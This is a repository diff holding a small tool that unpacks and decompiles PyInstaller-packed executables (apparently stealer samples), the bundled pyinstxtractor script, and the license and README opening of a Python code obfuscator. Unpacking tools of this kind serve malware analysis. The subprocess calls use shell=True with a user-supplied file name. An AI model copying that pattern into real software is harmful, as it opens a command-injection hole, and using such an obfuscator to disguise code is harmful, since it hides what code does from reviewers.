# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# poetry
# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
# This is especially recommended for binary packages to ensure reproducibility, and is more
# commonly ignored for libraries.
# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
#poetry.lock
# pdm
# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
#pdm.lock
# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
# in version control.
# https://pdm.fming.dev/#use-with-ide
.pdm.toml
# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# pytype static type analyzer
.pytype/
# Cython debug symbols
cython_debug/
# PyCharm
# JetBrains specific template is maintained in a separate JetBrains.gitignore that can
# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
# and can be added to the global gitignore or merged into this file. For a more nuclear
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
#.idea/

21
PyAnalyzer-UnpackStealers/LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2024 gumbobr0t
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

10
PyAnalyzer-UnpackStealers/README.md Normal file
View File

@@ -0,0 +1,10 @@
# PyAnalyzer
Simple python script utilizing pycdc and pyinstxtractor to decompile and disassemble pyinstaller packed executables.
⚠️**You might need to build the pycdc executable yourself and place it inside the `resources` folder, because it does not work on every system.**
https://github.com/zrax/pycdc
Example usage:
`python main.py FILE_TO_ANALYZE.exe`
Thanks to zrax and extremecoders for the disassemblers and unpackers.

95
PyAnalyzer-UnpackStealers/main.py Normal file
View File

@@ -0,0 +1,95 @@
import subprocess
import os
import shutil
import sys
import logging
logging.basicConfig(filename='analyzer.log', level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
def decompile_pyc(pyc_file, source_dir):
try:
pycdc_process = subprocess.Popen(['resources\pycdc.exe', pyc_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
stdout, stderr = pycdc_process.communicate()
decoded_code = stdout.decode('utf-8')
pyc_filename = os.path.basename(pyc_file)
py_filename = pyc_filename[:-4] + '.py'
count = 2
while os.path.exists(os.path.join(source_dir, py_filename)):
py_filename = pyc_filename[:-4] + f'_{count}.py'
count += 1
py_filepath = os.path.join(source_dir, py_filename)
with open(py_filepath, 'w') as py_file:
py_file.write(decoded_code)
logging.info(f"Decompiled {pyc_filename}")
print(f"Decompiled {pyc_filename}")
except Exception as e:
logging.error(f"Error decompiling pyc: {e}")
print(f"Error decompiling pyc: {e}")
return
def main():
logging.info("Starting analysis.")
if len(sys.argv) != 2:
logging.error("Usage: python script.py FILE_TO_ANALYZE.exe")
print("Usage: python script.py FILE_TO_ANALYZE.exe")
sys.exit(1)
file_to_analyze = sys.argv[1]
extracted_dir = file_to_analyze + '_extracted'
source_dir = file_to_analyze + '_source'
entry_points_dir = os.path.join(source_dir, 'entry_points')
os.makedirs(source_dir, exist_ok=True)
os.makedirs(entry_points_dir, exist_ok=True)
try:
pycdc_process = subprocess.Popen(['python', 'resources\pyinstxtractor.py', file_to_analyze, '-w', extracted_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
stdout, stderr = pycdc_process.communicate()
output_lines = stdout.decode('utf-8').splitlines()
entry_points = [line.split()[-1] for line in output_lines if 'Possible entry point' in line]
logging.info(f"Possible entry points: {entry_points}")
for root, dirs, files in os.walk(extracted_dir):
for file in files:
if file.endswith('.pyc'):
pyc_file = os.path.join(root, file)
pyc_filename = os.path.basename(pyc_file)
if pyc_filename in entry_points:
logging.info(f"Decompiling entry point: {pyc_filename}")
decompile_pyc(pyc_file, source_dir)
source_file = os.path.join(source_dir, pyc_filename[:-4] + '.py')
entry_point_dest = os.path.join(entry_points_dir, pyc_filename[:-4] + '.py')
shutil.move(source_file, entry_point_dest)
continue_with_others = input("Do you want to continue with decompiling other files? (y/n): ").strip().lower()
if continue_with_others != 'y':
logging.info("Decompilation of other files cancelled.")
print("Decompilation of other files cancelled.")
shutil.rmtree(extracted_dir)
logging.info("Analysis completed.")
print("Analysis completed.")
sys.exit(0)
for root, dirs, files in os.walk(extracted_dir):
for file in files:
if file.endswith('.pyc'):
pyc_file = os.path.join(root, file)
pyc_filename = os.path.basename(pyc_file)
if pyc_filename not in entry_points:
logging.info(f"Decompiling: {pyc_filename}")
decompile_pyc(pyc_file, source_dir)
except subprocess.CalledProcessError as e:
logging.error(f"Error extracting bytecode: {e}")
print(f"Error extracting bytecode: {e}")
sys.exit(1)
shutil.rmtree(extracted_dir)
logging.info("Analysis completed.")
print("Analysis completed.")
if __name__ == '__main__':
main()

1
PyAnalyzer-UnpackStealers/requirements.txt Normal file
View File

@@ -0,0 +1 @@
logging

BIN
PyAnalyzer-UnpackStealers/resources/pycdc.exe Normal file
View File

Binary file not shown.

468
PyAnalyzer-UnpackStealers/resources/pyinstxtractor.py Normal file
View File

@@ -0,0 +1,468 @@
"""
PyInstaller Extractor v2.0 (Supports pyinstaller 5.13.0, 5.12.0, 5.11.0, 5.10.1, 5.10.0, 5.9.0, 5.8.0, 5.7.0, 5.6.2, 5.6.1, 5.6, 5.5, 5.4.1, 5.4, 5.3, 5.2, 5.1, 5.0.1, 5.0, 4.10, 4.9, 4.8, 4.7, 4.6, 4.5.1, 4.5, 4.4, 4.3, 4.2, 4.1, 4.0, 3.6, 3.5, 3.4, 3.3, 3.2, 3.1, 3.0, 2.1, 2.0)
Author : Extreme Coders
E-mail : extremecoders(at)hotmail(dot)com
Web : https://0xec.blogspot.com
Date : 26-March-2020
Url : https://github.com/extremecoders-re/pyinstxtractor
For any suggestions, leave a comment on
https://forum.tuts4you.com/topic/34455-pyinstaller-extractor/
This script extracts a pyinstaller generated executable file.
Pyinstaller installation is not needed. The script has it all.
For best results, it is recommended to run this script in the
same version of python as was used to create the executable.
This is just to prevent unmarshalling errors(if any) while
extracting the PYZ archive.
Usage : Just copy this script to the directory where your exe resides
and run the script with the exe file name as a parameter
C:\path\to\exe\>python pyinstxtractor.py <filename>
$ /path/to/exe/python pyinstxtractor.py <filename>
Licensed under GNU General Public License (GPL) v3.
You are free to modify this source.
CHANGELOG
================================================
Version 1.1 (Jan 28, 2014)
-------------------------------------------------
- First Release
- Supports only pyinstaller 2.0
Version 1.2 (Sept 12, 2015)
-------------------------------------------------
- Added support for pyinstaller 2.1 and 3.0 dev
- Cleaned up code
- Script is now more verbose
- Executable extracted within a dedicated sub-directory
(Support for pyinstaller 3.0 dev is experimental)
Version 1.3 (Dec 12, 2015)
-------------------------------------------------
- Added support for pyinstaller 3.0 final
- Script is compatible with both python 2.x & 3.x (Thanks to Moritz Kroll @ Avira Operations GmbH & Co. KG)
Version 1.4 (Jan 19, 2016)
-------------------------------------------------
- Fixed a bug when writing pyc files >= version 3.3 (Thanks to Daniello Alto: https://github.com/Djamana)
Version 1.5 (March 1, 2016)
-------------------------------------------------
- Added support for pyinstaller 3.1 (Thanks to Berwyn Hoyt for reporting)
Version 1.6 (Sept 5, 2016)
-------------------------------------------------
- Added support for pyinstaller 3.2
- Extractor will use a random name while extracting unnamed files.
- For encrypted pyz archives it will dump the contents as is. Previously, the tool would fail.
Version 1.7 (March 13, 2017)
-------------------------------------------------
- Made the script compatible with python 2.6 (Thanks to Ross for reporting)
Version 1.8 (April 28, 2017)
-------------------------------------------------
- Support for sub-directories in .pyz files (Thanks to Moritz Kroll @ Avira Operations GmbH & Co. KG)
Version 1.9 (November 29, 2017)
-------------------------------------------------
- Added support for pyinstaller 3.3
- Display the scripts which are run at entry (Thanks to Michael Gillespie @ malwarehunterteam for the feature request)
Version 2.0 (March 26, 2020)
-------------------------------------------------
- Project migrated to github
- Supports pyinstaller 3.6
- Added support for Python 3.7, 3.8
- The header of all extracted pyc's are now automatically fixed
"""
from __future__ import print_function
import os
import struct
import marshal
import zlib
import sys
from uuid import uuid4 as uniquename
class CTOCEntry:
def __init__(self, position, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name):
self.position = position
self.cmprsdDataSize = cmprsdDataSize
self.uncmprsdDataSize = uncmprsdDataSize
self.cmprsFlag = cmprsFlag
self.typeCmprsData = typeCmprsData
self.name = name
class PyInstArchive:
PYINST20_COOKIE_SIZE = 24 # For pyinstaller 2.0
PYINST21_COOKIE_SIZE = 24 + 64 # For pyinstaller 2.1+
MAGIC = b'MEI\014\013\012\013\016' # Magic number which identifies pyinstaller
def __init__(self, path):
self.filePath = path
self.pycMagic = b'\0' * 4
self.barePycList = [] # List of pyc's whose headers have to be fixed
def open(self):
try:
self.fPtr = open(self.filePath, 'rb')
self.fileSize = os.stat(self.filePath).st_size
except:
print('[!] Error: Could not open {0}'.format(self.filePath))
return False
return True
def close(self):
try:
self.fPtr.close()
except:
pass
def checkFile(self):
print('[+] Processing {0}'.format(self.filePath))
searchChunkSize = 8192
endPos = self.fileSize
self.cookiePos = -1
if endPos < len(self.MAGIC):
print('[!] Error : File is too short or truncated')
return False
while True:
startPos = endPos - searchChunkSize if endPos >= searchChunkSize else 0
chunkSize = endPos - startPos
if chunkSize < len(self.MAGIC):
break
self.fPtr.seek(startPos, os.SEEK_SET)
data = self.fPtr.read(chunkSize)
offs = data.rfind(self.MAGIC)
if offs != -1:
self.cookiePos = startPos + offs
break
endPos = startPos + len(self.MAGIC) - 1
if startPos == 0:
break
if self.cookiePos == -1:
print('[!] Error : Missing cookie, unsupported pyinstaller version or not a pyinstaller archive')
return False
self.fPtr.seek(self.cookiePos + self.PYINST20_COOKIE_SIZE, os.SEEK_SET)
if b'python' in self.fPtr.read(64).lower():
print('[+] Pyinstaller version: 2.1+')
self.pyinstVer = 21 # pyinstaller 2.1+
else:
self.pyinstVer = 20 # pyinstaller 2.0
print('[+] Pyinstaller version: 2.0')
return True
def getCArchiveInfo(self):
try:
if self.pyinstVer == 20:
self.fPtr.seek(self.cookiePos, os.SEEK_SET)
# Read CArchive cookie
(magic, lengthofPackage, toc, tocLen, pyver) = \
struct.unpack('!8siiii', self.fPtr.read(self.PYINST20_COOKIE_SIZE))
elif self.pyinstVer == 21:
self.fPtr.seek(self.cookiePos, os.SEEK_SET)
# Read CArchive cookie
(magic, lengthofPackage, toc, tocLen, pyver, pylibname) = \
struct.unpack('!8sIIii64s', self.fPtr.read(self.PYINST21_COOKIE_SIZE))
except:
print('[!] Error : The file is not a pyinstaller archive')
return False
self.pymaj, self.pymin = (pyver//100, pyver%100) if pyver >= 100 else (pyver//10, pyver%10)
print('[+] Python version: {0}.{1}'.format(self.pymaj, self.pymin))
# Additional data after the cookie
tailBytes = self.fileSize - self.cookiePos - (self.PYINST20_COOKIE_SIZE if self.pyinstVer == 20 else self.PYINST21_COOKIE_SIZE)
# Overlay is the data appended at the end of the PE
self.overlaySize = lengthofPackage + tailBytes
self.overlayPos = self.fileSize - self.overlaySize
self.tableOfContentsPos = self.overlayPos + toc
self.tableOfContentsSize = tocLen
print('[+] Length of package: {0} bytes'.format(lengthofPackage))
return True
def parseTOC(self):
# Go to the table of contents
self.fPtr.seek(self.tableOfContentsPos, os.SEEK_SET)
self.tocList = []
parsedLen = 0
# Parse table of contents
while parsedLen < self.tableOfContentsSize:
(entrySize, ) = struct.unpack('!i', self.fPtr.read(4))
nameLen = struct.calcsize('!iIIIBc')
(entryPos, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name) = \
struct.unpack( \
'!IIIBc{0}s'.format(entrySize - nameLen), \
self.fPtr.read(entrySize - 4))
try:
name = name.decode("utf-8").rstrip("\0")
except UnicodeDecodeError:
newName = str(uniquename())
print('[!] Warning: File name {0} contains invalid bytes. Using random name {1}'.format(name, newName))
name = newName
# Prevent writing outside the extraction directory
if name.startswith("/"):
name = name.lstrip("/")
if len(name) == 0:
name = str(uniquename())
print('[!] Warning: Found an unamed file in CArchive. Using random name {0}'.format(name))
self.tocList.append( \
CTOCEntry( \
self.overlayPos + entryPos, \
cmprsdDataSize, \
uncmprsdDataSize, \
cmprsFlag, \
typeCmprsData, \
name \
))
parsedLen += entrySize
print('[+] Found {0} files in CArchive'.format(len(self.tocList)))
def _writeRawData(self, filepath, data):
nm = filepath.replace('\\', os.path.sep).replace('/', os.path.sep).replace('..', '__')
nmDir = os.path.dirname(nm)
if nmDir != '' and not os.path.exists(nmDir): # Check if path exists, create if not
os.makedirs(nmDir)
with open(nm, 'wb') as f:
f.write(data)
def extractFiles(self):
print('[+] Beginning extraction...please standby')
extractionDir = os.path.join(os.getcwd(), os.path.basename(self.filePath) + '_extracted')
if not os.path.exists(extractionDir):
os.mkdir(extractionDir)
os.chdir(extractionDir)
for entry in self.tocList:
self.fPtr.seek(entry.position, os.SEEK_SET)
data = self.fPtr.read(entry.cmprsdDataSize)
if entry.cmprsFlag == 1:
try:
data = zlib.decompress(data)
except zlib.error:
print('[!] Error : Failed to decompress {0}'.format(entry.name))
continue
# Malware may tamper with the uncompressed size
# Comment out the assertion in such a case
assert len(data) == entry.uncmprsdDataSize # Sanity Check
if entry.typeCmprsData == b'd' or entry.typeCmprsData == b'o':
# d -> ARCHIVE_ITEM_DEPENDENCY
# o -> ARCHIVE_ITEM_RUNTIME_OPTION
# These are runtime options, not files
continue
basePath = os.path.dirname(entry.name)
if basePath != '':
# Check if path exists, create if not
if not os.path.exists(basePath):
os.makedirs(basePath)
if entry.typeCmprsData == b's':
# s -> ARCHIVE_ITEM_PYSOURCE
# Entry point are expected to be python scripts
print('[+] Possible entry point: {0}.pyc'.format(entry.name))
if self.pycMagic == b'\0' * 4:
# if we don't have the pyc header yet, fix them in a later pass
self.barePycList.append(entry.name + '.pyc')
self._writePyc(entry.name + '.pyc', data)
elif entry.typeCmprsData == b'M' or entry.typeCmprsData == b'm':
# M -> ARCHIVE_ITEM_PYPACKAGE
# m -> ARCHIVE_ITEM_PYMODULE
# packages and modules are pyc files with their header intact
# From PyInstaller 5.3 and above pyc headers are no longer stored
# https://github.com/pyinstaller/pyinstaller/commit/a97fdf
if data[2:4] == b'\r\n':
# < pyinstaller 5.3
if self.pycMagic == b'\0' * 4:
self.pycMagic = data[0:4]
self._writeRawData(entry.name + '.pyc', data)
else:
# >= pyinstaller 5.3
if self.pycMagic == b'\0' * 4:
# if we don't have the pyc header yet, fix them in a later pass
self.barePycList.append(entry.name + '.pyc')
self._writePyc(entry.name + '.pyc', data)
else:
self._writeRawData(entry.name, data)
if entry.typeCmprsData == b'z' or entry.typeCmprsData == b'Z':
self._extractPyz(entry.name)
# Fix bare pyc's if any
self._fixBarePycs()
def _fixBarePycs(self):
for pycFile in self.barePycList:
with open(pycFile, 'r+b') as pycFile:
# Overwrite the first four bytes
pycFile.write(self.pycMagic)
def _writePyc(self, filename, data):
with open(filename, 'wb') as pycFile:
pycFile.write(self.pycMagic) # pyc magic
if self.pymaj >= 3 and self.pymin >= 7: # PEP 552 -- Deterministic pycs
pycFile.write(b'\0' * 4) # Bitfield
pycFile.write(b'\0' * 8) # (Timestamp + size) || hash
else:
pycFile.write(b'\0' * 4) # Timestamp
if self.pymaj >= 3 and self.pymin >= 3:
pycFile.write(b'\0' * 4) # Size parameter added in Python 3.3
pycFile.write(data)
def _extractPyz(self, name):
dirName = name + '_extracted'
# Create a directory for the contents of the pyz
if not os.path.exists(dirName):
os.mkdir(dirName)
with open(name, 'rb') as f:
pyzMagic = f.read(4)
assert pyzMagic == b'PYZ\0' # Sanity Check
pyzPycMagic = f.read(4) # Python magic value
if self.pycMagic == b'\0' * 4:
self.pycMagic = pyzPycMagic
elif self.pycMagic != pyzPycMagic:
self.pycMagic = pyzPycMagic
print('[!] Warning: pyc magic of files inside PYZ archive are different from those in CArchive')
# Skip PYZ extraction if not running under the same python version
if self.pymaj != sys.version_info.major or self.pymin != sys.version_info.minor:
print('[!] Warning: This script is running in a different Python version than the one used to build the executable.')
print('[!] Please run this script in Python {0}.{1} to prevent extraction errors during unmarshalling'.format(self.pymaj, self.pymin))
print('[!] Skipping pyz extraction')
return
(tocPosition, ) = struct.unpack('!i', f.read(4))
f.seek(tocPosition, os.SEEK_SET)
try:
toc = marshal.load(f)
except:
print('[!] Unmarshalling FAILED. Cannot extract {0}. Extracting remaining files.'.format(name))
return
print('[+] Found {0} files in PYZ archive'.format(len(toc)))
# From pyinstaller 3.1+ toc is a list of tuples
if type(toc) == list:
toc = dict(toc)
for key in toc.keys():
(ispkg, pos, length) = toc[key]
f.seek(pos, os.SEEK_SET)
fileName = key
try:
# for Python > 3.3 some keys are bytes object some are str object
fileName = fileName.decode('utf-8')
except:
pass
# Prevent writing outside dirName
fileName = fileName.replace('..', '__').replace('.', os.path.sep)
if ispkg == 1:
filePath = os.path.join(dirName, fileName, '__init__.pyc')
else:
filePath = os.path.join(dirName, fileName + '.pyc')
fileDir = os.path.dirname(filePath)
if not os.path.exists(fileDir):
os.makedirs(fileDir)
try:
data = f.read(length)
data = zlib.decompress(data)
except:
print('[!] Error: Failed to decompress {0}, probably encrypted. Extracting as is.'.format(filePath))
open(filePath + '.encrypted', 'wb').write(data)
else:
self._writePyc(filePath, data)
def main():
if len(sys.argv) < 2:
print('[+] Usage: pyinstxtractor.py <filename>')
else:
arch = PyInstArchive(sys.argv[1])
if arch.open():
if arch.checkFile():
if arch.getCArchiveInfo():
arch.parseTOC()
arch.extractFiles()
arch.close()
print('[+] Successfully extracted pyinstaller archive: {0}'.format(sys.argv[1]))
print('')
print('You can now use a python decompiler on the pyc files within the extracted directory')
return
arch.close()
if __name__ == '__main__':
main()

277
Rose-Obfv1/LICENSE Normal file
View File

@@ -0,0 +1,277 @@
Eclipse Public License - v 2.0
THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE
PUBLIC LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION
OF THE PROGRAM CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT.
1. DEFINITIONS
"Contribution" means:
a) in the case of the initial Contributor, the initial content
Distributed under this Agreement, and
b) in the case of each subsequent Contributor:
i) changes to the Program, and
ii) additions to the Program;
where such changes and/or additions to the Program originate from
and are Distributed by that particular Contributor. A Contribution
"originates" from a Contributor if it was added to the Program by
such Contributor itself or anyone acting on such Contributor's behalf.
Contributions do not include changes or additions to the Program that
are not Modified Works.
"Contributor" means any person or entity that Distributes the Program.
"Licensed Patents" mean patent claims licensable by a Contributor which
are necessarily infringed by the use or sale of its Contribution alone
or when combined with the Program.
"Program" means the Contributions Distributed in accordance with this
Agreement.
"Recipient" means anyone who receives the Program under this Agreement
or any Secondary License (as applicable), including Contributors.
"Derivative Works" shall mean any work, whether in Source Code or other
form, that is based on (or derived from) the Program and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship.
"Modified Works" shall mean any work in Source Code or other form that
results from an addition to, deletion from, or modification of the
contents of the Program, including, for purposes of clarity any new file
in Source Code form that contains any contents of the Program. Modified
Works shall not include works that contain only declarations,
interfaces, types, classes, structures, or files of the Program solely
in each case in order to link to, bind by name, or subclass the Program
or Modified Works thereof.
"Distribute" means the acts of a) distributing or b) making available
in any manner that enables the transfer of a copy.
"Source Code" means the form of a Program preferred for making
modifications, including but not limited to software source code,
documentation source, and configuration files.
"Secondary License" means either the GNU General Public License,
Version 2.0, or any later versions of that license, including any
exceptions or additional permissions as identified by the initial
Contributor.
2. GRANT OF RIGHTS
a) Subject to the terms of this Agreement, each Contributor hereby
grants Recipient a non-exclusive, worldwide, royalty-free copyright
license to reproduce, prepare Derivative Works of, publicly display,
publicly perform, Distribute and sublicense the Contribution of such
Contributor, if any, and such Derivative Works.
b) Subject to the terms of this Agreement, each Contributor hereby
grants Recipient a non-exclusive, worldwide, royalty-free patent
license under Licensed Patents to make, use, sell, offer to sell,
import and otherwise transfer the Contribution of such Contributor,
if any, in Source Code or other form. This patent license shall
apply to the combination of the Contribution and the Program if, at
the time the Contribution is added by the Contributor, such addition
of the Contribution causes such combination to be covered by the
Licensed Patents. The patent license shall not apply to any other
combinations which include the Contribution. No hardware per se is
licensed hereunder.
c) Recipient understands that although each Contributor grants the
licenses to its Contributions set forth herein, no assurances are
provided by any Contributor that the Program does not infringe the
patent or other intellectual property rights of any other entity.
Each Contributor disclaims any liability to Recipient for claims
brought by any other entity based on infringement of intellectual
property rights or otherwise. As a condition to exercising the
rights and licenses granted hereunder, each Recipient hereby
assumes sole responsibility to secure any other intellectual
property rights needed, if any. For example, if a third party
patent license is required to allow Recipient to Distribute the
Program, it is Recipient's responsibility to acquire that license
before distributing the Program.
d) Each Contributor represents that to its knowledge it has
sufficient copyright rights in its Contribution, if any, to grant
the copyright license set forth in this Agreement.
e) Notwithstanding the terms of any Secondary License, no
Contributor makes additional grants to any Recipient (other than
those set forth in this Agreement) as a result of such Recipient's
receipt of the Program under the terms of a Secondary License
(if permitted under the terms of Section 3).
3. REQUIREMENTS
3.1 If a Contributor Distributes the Program in any form, then:
a) the Program must also be made available as Source Code, in
accordance with section 3.2, and the Contributor must accompany
the Program with a statement that the Source Code for the Program
is available under this Agreement, and informs Recipients how to
obtain it in a reasonable manner on or through a medium customarily
used for software exchange; and
b) the Contributor may Distribute the Program under a license
different than this Agreement, provided that such license:
i) effectively disclaims on behalf of all other Contributors all
warranties and conditions, express and implied, including
warranties or conditions of title and non-infringement, and
implied warranties or conditions of merchantability and fitness
for a particular purpose;
ii) effectively excludes on behalf of all other Contributors all
liability for damages, including direct, indirect, special,
incidental and consequential damages, such as lost profits;
iii) does not attempt to limit or alter the recipients' rights
in the Source Code under section 3.2; and
iv) requires any subsequent distribution of the Program by any
party to be under a license that satisfies the requirements
of this section 3.
3.2 When the Program is Distributed as Source Code:
a) it must be made available under this Agreement, or if the
Program (i) is combined with other material in a separate file or
files made available under a Secondary License, and (ii) the initial
Contributor attached to the Source Code the notice described in
Exhibit A of this Agreement, then the Program may be made available
under the terms of such Secondary Licenses, and
b) a copy of this Agreement must be included with each copy of
the Program.
3.3 Contributors may not remove or alter any copyright, patent,
trademark, attribution notices, disclaimers of warranty, or limitations
of liability ("notices") contained within the Program from any copy of
the Program which they Distribute, provided that Contributors may add
their own appropriate notices.
4. COMMERCIAL DISTRIBUTION
Commercial distributors of software may accept certain responsibilities
with respect to end users, business partners and the like. While this
license is intended to facilitate the commercial use of the Program,
the Contributor who includes the Program in a commercial product
offering should do so in a manner which does not create potential
liability for other Contributors. Therefore, if a Contributor includes
the Program in a commercial product offering, such Contributor
("Commercial Contributor") hereby agrees to defend and indemnify every
other Contributor ("Indemnified Contributor") against any losses,
damages and costs (collectively "Losses") arising from claims, lawsuits
and other legal actions brought by a third party against the Indemnified
Contributor to the extent caused by the acts or omissions of such
Commercial Contributor in connection with its distribution of the Program
in a commercial product offering. The obligations in this section do not
apply to any claims or Losses relating to any actual or alleged
intellectual property infringement. In order to qualify, an Indemnified
Contributor must: a) promptly notify the Commercial Contributor in
writing of such claim, and b) allow the Commercial Contributor to control,
and cooperate with the Commercial Contributor in, the defense and any
related settlement negotiations. The Indemnified Contributor may
participate in any such claim at its own expense.
For example, a Contributor might include the Program in a commercial
product offering, Product X. That Contributor is then a Commercial
Contributor. If that Commercial Contributor then makes performance
claims, or offers warranties related to Product X, those performance
claims and warranties are such Commercial Contributor's responsibility
alone. Under this section, the Commercial Contributor would have to
defend claims against the other Contributors related to those performance
claims and warranties, and if a court requires any other Contributor to
pay any damages as a result, the Commercial Contributor must pay
those damages.
5. NO WARRANTY
EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT
PERMITTED BY APPLICABLE LAW, THE PROGRAM IS PROVIDED ON AN "AS IS"
BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR
IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF
TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR
PURPOSE. Each Recipient is solely responsible for determining the
appropriateness of using and distributing the Program and assumes all
risks associated with its exercise of rights under this Agreement,
including but not limited to the risks and costs of program errors,
compliance with applicable laws, damage to or loss of data, programs
or equipment, and unavailability or interruption of operations.
6. DISCLAIMER OF LIABILITY
EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT
PERMITTED BY APPLICABLE LAW, NEITHER RECIPIENT NOR ANY CONTRIBUTORS
SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION LOST
PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE
EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
7. GENERAL
If any provision of this Agreement is invalid or unenforceable under
applicable law, it shall not affect the validity or enforceability of
the remainder of the terms of this Agreement, and without further
action by the parties hereto, such provision shall be reformed to the
minimum extent necessary to make such provision valid and enforceable.
If Recipient institutes patent litigation against any entity
(including a cross-claim or counterclaim in a lawsuit) alleging that the
Program itself (excluding combinations of the Program with other software
or hardware) infringes such Recipient's patent(s), then such Recipient's
rights granted under Section 2(b) shall terminate as of the date such
litigation is filed.
All Recipient's rights under this Agreement shall terminate if it
fails to comply with any of the material terms or conditions of this
Agreement and does not cure such failure in a reasonable period of
time after becoming aware of such noncompliance. If all Recipient's
rights under this Agreement terminate, Recipient agrees to cease use
and distribution of the Program as soon as reasonably practicable.
However, Recipient's obligations under this Agreement and any licenses
granted by Recipient relating to the Program shall continue and survive.
Everyone is permitted to copy and distribute copies of this Agreement,
but in order to avoid inconsistency the Agreement is copyrighted and
may only be modified in the following manner. The Agreement Steward
reserves the right to publish new versions (including revisions) of
this Agreement from time to time. No one other than the Agreement
Steward has the right to modify this Agreement. The Eclipse Foundation
is the initial Agreement Steward. The Eclipse Foundation may assign the
responsibility to serve as the Agreement Steward to a suitable separate
entity. Each new version of the Agreement will be given a distinguishing
version number. The Program (including Contributions) may always be
Distributed subject to the version of the Agreement under which it was
received. In addition, after a new version of the Agreement is published,
Contributor may elect to Distribute the Program (including its
Contributions) under the new version.
Except as expressly stated in Sections 2(a) and 2(b) above, Recipient
receives no rights or licenses to the intellectual property of any
Contributor under this Agreement, whether expressly, by implication,
estoppel or otherwise. All rights in the Program not expressly granted
under this Agreement are reserved. Nothing in this Agreement is intended
to be enforceable by any entity that is not a Contributor or Recipient.
No third-party beneficiary rights are created under this Agreement.
Exhibit A - Form of Secondary Licenses Notice
"This Source Code may also be made available under the following
Secondary Licenses when the conditions for such availability set forth
in the Eclipse Public License, v. 2.0 are satisfied: {name license(s),
version(s), and exceptions or additional permissions here}."
Simply including a copy of this Agreement, including this Exhibit A
is not sufficient to license the Source Code under Secondary Licenses.
If it is not possible or desirable to put the notice in a particular
file, then You may include the notice in a location (such as a LICENSE
file in a relevant directory) where a recipient would be likely to
look for such a notice.
You may add additional accurate notices of copyright ownership.

184
Rose-Obfv1/README.md Normal file
View File

@@ -0,0 +1,184 @@
# [NEW VERSION HERE](https://github.com/gumbobr0t/rose-obf)!
<div align="center" id="top">
<img src="./img.png" alt="RoseGuardian Logo" />
<br />
<br />
<p>:rose: A Python Code Obfuscator :shield:</p>
</div>
<h1 align="center">RoseGuardian</h1>
<p align="center">
<img alt="Top Language" src="https://img.shields.io/github/languages/top/DamagingRose/RoseGuardian">
<img alt="Stars" src="https://img.shields.io/github/stars/DamagingRose/RoseGuardian">
<img alt="License" src="https://img.shields.io/github/license/DamagingRose/RoseGuardian">
</p>
<p align="center">
<a href="#about">About</a> &#xa0; | &#xa0;
<a href="#features">Features</a> &#xa0; | &#xa0;
<a href="#usage">Usage</a> &#xa0; | &#xa0;
<a href="#todo">Todo</a> &#xa0; | &#xa0;
<a href="#examples">Examples</a> &#xa0; | &#xa0;
<a href="#license">License</a> &#xa0; | &#xa0;
<a href="#author">Author</a>
</p>
<br>
